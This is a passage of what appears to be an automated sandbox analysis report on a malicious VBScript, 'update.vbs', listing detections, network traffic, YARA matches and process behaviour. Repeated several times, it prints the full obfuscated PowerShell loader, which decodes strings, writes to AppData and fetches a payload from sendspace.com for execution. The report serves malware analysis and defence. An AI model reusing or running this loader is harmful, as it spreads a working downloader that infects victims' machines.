(Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.inca

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.00000000076C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000005.00000002.2565659187.00000000077AA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Joe Sandbox ViewIP Address: 69.31.136.57 69.31.136.57
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/7dhid7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n1.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/medjl1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n2.sendspace.comConnection: Keep-AliveCookie: SID=9rlcod4jutplauo2untp3jfqk6
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pro/dl/7dhid7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n1.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/medjl1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n2.sendspace.comConnection: Keep-AliveCookie: SID=9rlcod4jutplauo2untp3jfqk6
              Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs13n1.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n2.sendspace.com
              Source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microt
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs13n1.sendspace.com
              Source: powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wab.exe, 00000008.00000002.2724545147.000000000069D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com/
              Source: wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com/.
              Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com/5778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin
              Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119
              Source: wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com/m
              Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com/om:443l
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspaX
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31B0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F2FE13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com0
              Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F30E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F3192E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/IwX
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/7dhid7P
              Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/7dhid7XR
              Source: wab.exe, 00000008.00000002.2724545147.0000000000673000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2725055070.0000000000750000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/medjl1
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49714 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_1988.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_2624.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2624, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7309
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7309
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7309Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7309Jump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F1D6022_2_00007FF848F1D602
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F1C8562_2_00007FF848F1C856
              Source: update.vbsInitial sample: Strings found which are bigger than 50
              Source: amsi64_1988.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_2624.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2624, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@13/9@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Acetylmethylcarbinol.RonJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcqrymq3.s22.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1988
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2624
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd 